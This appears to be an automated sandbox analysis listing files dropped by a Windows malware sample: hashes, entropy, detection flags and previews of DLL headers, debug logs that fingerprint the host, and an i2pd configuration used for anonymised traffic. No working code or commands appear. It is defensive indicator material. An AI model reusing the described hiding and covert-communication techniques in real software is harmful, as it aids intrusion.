                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffdac0fb070)..[I] (tcp_connect) -> Done(sock=0x35c,host=7
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):92672
                                                    Entropy (8bit):6.242846530333761
                                                    Encrypted:false
                                                    SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                                    MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                                    SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                                    SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                                    SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5869
                                                    Entropy (8bit):5.4213113828756
                                                    Encrypted:false
                                                    SSDEEP:96:idHrNBJ9VTzBosmEmENyEyEkEY3mc7w7tQF3:ALNDTf2pEmENyEyEkEJ8x
                                                    MD5:37C419FF32F13B7C7510C2BF785889AE
                                                    SHA1:D75E8F852E716000D136FF015177E5EA3B0F029A
                                                    SHA-256:E2AD9CC58BA0543A8DB2BC6A0A538273EAEF7CCFF839D4D4D504783D3618CD46
                                                    SHA-512:28914181CE461975FBB3E9E6303739FB0B963237D6356DB96D07DCDC31F69419E90F13EC0B09A7C9B38D8143E8BFFAD7239AB205B00D976FECE1824EE536F2F7
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):8568
                                                    Entropy (8bit):4.958673415285098
                                                    Encrypted:false
                                                    SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                    MD5:27535CEE6740DFC50A78A0322415E67C
                                                    SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                    SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                    SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                    Malicious:false
                                                    Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):62449
                                                    Entropy (8bit):7.807149241969407
                                                    Encrypted:false
                                                    SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                                    MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                                    SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                                    SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                                    SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                                    Malicious:false
                                                    Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):7.607386617690871
                                                    Encrypted:false
                                                    SSDEEP:6:BLPj3joSjziv2Fz+MKTClJ0CLVHTU9jDv8oQj1Uox+CBmewFfIOAVdwvLYvjcUaI:BLPlWe9ZKTClJ0Ch49jtfCmFYvjRn
                                                    MD5:0E62A43977B6B9D1ADC79CA390F2869D
                                                    SHA1:132246241B52725786DEBB0F8CE578133F48AC57
                                                    SHA-256:D59858BA6A5C0560120E6B0C0A363A676CD92AD1BB2D0C848A09A312F28C706F
                                                    SHA-512:2A3DC3B2238997FBB5D19CC51EF98110B70B6F5636F0E995763BF4A3D3C3703562E74726B175BA5CB5D493B720CB765BC2DD900144573D13357638572791B757
                                                    Malicious:false
                                                    Preview:.+tn.Hi..s&....'Q....@I...#m.!.+..|<....0C..vl..5.1.....R`@.{..6.%D......."O......8..b1s5..Y......$d.I2...}..7Q.y%8....Wo.p.|....e.....9hfb...oA.7.:~C..'..T....J..|Ck^D.s.t.5.'...P?.T....9....z(.67..........UfO&.<.....@.F..-.R.Y.p~.A_.\?.fJ.Ku..V@P${.F.p.5..3p1.....,r.s.$.O.....&.z3.%|..G%].M..0..5mR...r.p@....#>.[.KHN..aI&.#c'.. ...+:....+S......h?`.;yT.....$.M.....O.AOv.o:........5......O..}...E._.})2.>..a.s%..._...a..j......:..w...U.x.g....h.).agT.....s9..&sW/._...Xd.....v4...Y3.T..<
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):7.6115831402029865
                                                    Encrypted:false
                                                    SSDEEP:12:G3U0Juh4Y6WLLyMWkylmqBQS0oA0DEg8aTgeBLPjCgwGdAhXB5m:G3Zg7LLyMWkylm/eN/8a9BLrR69B5m
                                                    MD5:5AA848157444FC63C6A900B620D329DB
                                                    SHA1:C1201DB7E3EC9685ABFEA182DCA94F2A20CE515F
                                                    SHA-256:917DEC085CF8A3FA8068F8BBC97F3012101955C114089BE52F7C021F091CD823
                                                    SHA-512:A5B9F7736E19056B1E873C58717796596536A3AF143D8633AA797F2327737AF39ED23DFC42801A20DA649D1187E507E06403623A3564A7EAEE1CF2ED2AC9B9E5
                                                    Malicious:false
                                                    Preview:r8E.......k..lh...zxw..\v..`.c*.NA.^./.w...yv~......t|k!z.D..K..}...d.7Y...C.%)......;.#H.t...*..aO....~"./.....w.{.6..$!..k.....N...6...$.p.....(....="....z....>n.z.7.-.x..+.H.[zX. ".W|.N.q.a:.N....q.[&K.5%../7...x.`dJ..8..K.N.bm.c..... js5Q.iD......H...&iD0.y......o...Q..l/....o..ZM$.\x..y..L..q.....r........E...J...c....`........BH.......q./.lV7\w.u.......f4_.2...J..7....d.KI.k'._.c?.Y+.....pR.A..(...J..gA.l..q......^...?D.KJ`.!........"....O9.y........U@..........-IB...}....<.a.R
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):80
                                                    Entropy (8bit):6.121928094887358
                                                    Encrypted:false
                                                    SSDEEP:3:wgqibDJtFfiIa94Lo3rgUACN1Nv:T3KIayGrgsN1Nv
                                                    MD5:B8D21CDE7E47C94F5426D1D85E81B517
                                                    SHA1:1D4938CF8C455C3F52C1C46C223BDE84A4E51F1E
                                                    SHA-256:1A1D599510760943250F6F2043A0EAC3A092BA17030DF727CC8553DEBF0F815D
                                                    SHA-512:413CD67032C9F4449658FD469BD539ED7028F4A0A17CA75D28CE8C3B4188C20893C3DABAF2E912F952B5C30DCA7CCFC8293A0A757BA255A468ED7C398A663AA2
                                                    Malicious:false
                                                    Preview:.n.Y...fp...9.Q.7h~\:.. .V....>.@&..GQ..[..{.It{.u.MR...j...`.A..........V....
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):721
                                                    Entropy (8bit):6.701317594490171
                                                    Encrypted:false
                                                    SSDEEP:12:VwIcIzeIzeIzeIzeIzeIzeIzeIzeIzeIz7o53Idrr8JDrJkoRIFdrl/GF8+97FCS:VwcrrrrrrrrrIIdr6hRwdr+wFz9i
                                                    MD5:DE6017E8BFBFE1FB3B07EA91C0B11D82
                                                    SHA1:EFF40BF4898A2B0D41E77A1BB2B246F9A8AB6605
                                                    SHA-256:DE8CA91AD067094A766A74AF2C1886894236003C2AD8CCF7B630C99543696915
                                                    SHA-512:C8B841A069506E11E2CCFF40990A2D51309034EC041E0D808C11FDCB3088232F553E2FF651F47140D9204FC2270A10EFBDE19CA5BF0A9B7B6C9859B1D326F8E5
                                                    Malicious:false
                                                    Preview:...T.8v.tRE...P..n.?..e.R.*j..O.......z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C..k...>...>i.Y..i.L..6.."p&#..................Vu............NTCP2.@.caps=.4;.s=,2Z5uBVkef4lmcK2QwDn8Udk3aH5cOqEbILNWwwgECz4=;.v=.2;..........SSU2.q.caps=.4;.i=,YwVt319tFfDgVHdVl2r1L8qj-Vt-aSogzpTPv0bIFfs=;.s=,r3OMI0mrR1rqAYU4tPFgwFLDXxpjzxCGkEhbIOoeFm0=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;9"......h....5...............WJF.;'....\..&...Hky...|.....G....
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):455
                                                    Entropy (8bit):6.112990685852996
                                                    Encrypted:false
                                                    SSDEEP:12:VwIcIzeIzeIzeIzeIzeIzeIzeIzeIzeIz7STgi3Hz1:VwcrrrrrrrrrfMT1
                                                    MD5:7E37092D21BB39A4F780AA38CADFBF23
                                                    SHA1:491C300C2A78300B46C83F4D239060B2CA688967
                                                    SHA-256:A4CCD2CC9CC1E5B5BE1785BC2639810443C50D65D16C615860676756C2345F5C
                                                    SHA-512:863F32050082216691694300F8565E3BB267455FCB799D8F9EB2F709C2E6252CA364D538E4571F3FAAA5809CBB747E639C4D3FCD7A4EB739582DF9862A89AA1D
                                                    Malicious:false
                                                    Preview:...T.8v.tRE...P..n.?..e.R.*j..O.......z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C.........z=."cF.B...9.f....{..C..k...>...>i.Y..i.L..6.."p&#.................[;k.=)QoDW..Vk.......$L.=`U........F.....U.3-?Qr..].j4...
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):96
                                                    Entropy (8bit):6.144705599611885
                                                    Encrypted:false
                                                    SSDEEP:3:Cvi/cg4dZyJ0kvczyAo6gguPfvGPo9l1tr:Wbg4dZAYzyA/geP27tr
                                                    MD5:FD8660BEA803245F99B862B76D472D21
                                                    SHA1:3B4741A9A236CCF5FAA33F1A36F5CEAECD9A822E
                                                    SHA-256:38D0B704F9BD8D8C1B45593DB0EAB3287958247B87B2479F007CE61F2F215B34
                                                    SHA-512:0D667346A981253A92C8A8744291E14069DB743508C0F3794AD2D0DC2E419C93C25E9C6FDE54DE134C0DC1DD3BFDCFF6E01A35EC6FD88DD811C6F725A9C488F3
                                                    Malicious:false
                                                    Preview:.s.#I.GZ...8..`.R._.c....H[ ...m....L.zi.. S...qR..l..........=kc.m._m...TwU.j./..[~i* ..F...
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):9146880
                                                    Entropy (8bit):6.674868432808522
                                                    Encrypted:false
                                                    SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                    MD5:676064A5CC4729E609539F9C9BD9D427
                                                    SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                    SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                    SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):89088
                                                    Entropy (8bit):6.229509810228039
                                                    Encrypted:false
                                                    SSDEEP:1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
                                                    MD5:4E320E2F46342D6D4657D2ADBF1F22D0
                                                    SHA1:A5ACFE6397DFFC61D243206885C389EA05428755
                                                    SHA-256:7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
                                                    SHA-512:E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4672
                                                    Entropy (8bit):5.351915267526841
                                                    Encrypted:false
                                                    SSDEEP:96:idHwWBJ9VTyHzHH0Hf0HaSHJmHu5SHSApmHSm5SH5mHOn5SHpSHzmHX5SHDmHH59:AzDTmTn0/06SAO5SHAz5SQc5SJSq35SA
                                                    MD5:F62C4CA3E55DB716F9970D92EFD707BD
                                                    SHA1:2257C05B8106F38B33AFC1C905C979A9E2DB6124
                                                    SHA-256:EF5058C12B820220A7CE4121481A5E1AB195282BE971570C630236B9B11289F7
                                                    SHA-512:8DA4A829DE8255B5A08DA393F8ACD518651AF5DB0C96366B8583B29739B7A25BB08799CC529B08B5A9BB75559372EC447AA118CD51947E18560F8C96FC6E1E4C
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):105984
                                                    Entropy (8bit):6.2884725801282775
                                                    Encrypted:false
                                                    SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                                    MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                                    SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                                    SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                                    SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1167
                                                    Entropy (8bit):5.500983839309843
                                                    Encrypted:false
                                                    SSDEEP:24:CFAGHr5lGyclY7GfylD2BlD7cRE9FLxJsJ4b0ERYsXYnHeAOp:CFdHr54yclDEDsXcm9FL4gtueD
                                                    MD5:B15F04655D3BC46F6B827E3B42DAD2BD
                                                    SHA1:221F193C4B3DC896E1E346E258B1461CEE250C31
                                                    SHA-256:06361820811F5B22968B035CF7E6BA7842CD4D75BD7B4CCE12346F9E87047A76
                                                    SHA-512:39C64FBBF0564318A7D01BBB1F08E3C9D2D0209C084AF292866CD17323C642B4CD629F6744ACCDB265D4B9C5534D4DE20CDDF0CF518D6C0B7A024BE03B561897
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffda55d9d36)..[I] (tcp_connect) -> Done(sock=0x394,host=7
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):129024
                                                    Entropy (8bit):6.313152038164236
                                                    Encrypted:false
                                                    SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                                    MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                                    SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                                    SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                                    SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1354
                                                    Entropy (8bit):5.503866268480334
                                                    Encrypted:false
                                                    SSDEEP:24:CFAGH75lGyclY7GfylD2BlD7cRE9FLxJsJ4b0dk1RDoYeXY7YcRAENmMeAOp:CFdH754yclDEDsXcm9FL4gqPcLMMeD
                                                    MD5:53141CFA33B31F0CC85DA27FC7CC363D
                                                    SHA1:5A94CB9DB3D8B2C75F940EA05998C0C2DA87D411
                                                    SHA-256:984E72B7129E619810C646620D7CE929009F9AD6814041A5A939AC8BD3136E56
                                                    SHA-512:B311896AAE144055E547211FA0AD86F95357CF20EC86A3BE531A120E57C656A4711BB34F03BA1C7629F2E3725A5BAAF86F5F288663EDA1B155536019A71349AF
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffda55a
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):37376
                                                    Entropy (8bit):5.7181012847214445
                                                    Encrypted:false
                                                    SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                    MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                    SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                    SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                    SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
